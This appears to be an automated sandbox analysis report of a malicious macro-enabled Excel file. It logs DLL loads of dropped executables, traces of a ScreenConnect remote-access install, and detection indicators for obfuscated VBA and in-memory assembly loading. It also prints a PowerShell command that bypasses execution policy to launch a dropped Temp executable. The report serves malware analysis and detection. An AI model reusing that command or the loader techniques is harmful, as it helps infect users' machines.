                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: libcares-2.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: msvcp290.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: icu.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: libcares-2.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: msvcp290.dll
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeSection loaded: icu.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dll
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: ntkrnlmp.pdb source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: winload_prod.pdb' source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb0$4 source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4293631589.0000000005500000.00000004.08000000.00040000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6366331058.000000001BAB2000.00000002.00000001.01000000.00000019.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6333087252.0000000001E72000.00000002.00000001.01000000.00000018.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6327680600.0000000002CD0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4235339870.0000000002E90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000000.4266258398.000000000081D000.00000002.00000001.01000000.00000017.sdmp
                            Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000029.00000003.4243485948.0000000004B30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000B51000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.0000000005946000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4327567013.0000000007794000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000432C000.00000004.00000800.00020000.00000000.sdmp, 3dc3b4.msi.39.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Document.exe, 00000025.00000000.4208691924.000000000074D000.00000002.00000001.01000000.00000011.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains potential unpacker
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: 37.2.Document.exe.2e90000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Document contains an embedded VBA with many string operations indicating source code obfuscation
                            Source: Document25.xlsmStream path 'VBA/Module2' : High number of string operations
                            Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Module2Name: Module2
                            Suspicious powershell command line found
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FF727F8A540 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,8_2_00007FF727F8A540
                            Source: Document.exe.12.drStatic PE information: real checksum: 0x54d1c1 should be: 0x56b655
                            Source: libcares-2.dll.8.drStatic PE information: real checksum: 0x0 should be: 0x65f7e2
                            Source: msvcp290.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x3a6aa7
                            Source: msvcp290.dll.8.drStatic PE information: real checksum: 0x0 should be: 0x3a6aa7
                            Source: libcares-2.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x65f7e2
                            Source: libcares-2.dll.5.drStatic PE information: section name: _RDATA
                            Source: msvcp290.dll.5.drStatic PE information: section name: .managed
                            Source: msvcp290.dll.5.drStatic PE information: section name: _RDATA
                            Source: newpoveno.exe.5.drStatic PE information: section name: .xdata
                            Source: libcares-2.dll.8.drStatic PE information: section name: _RDATA
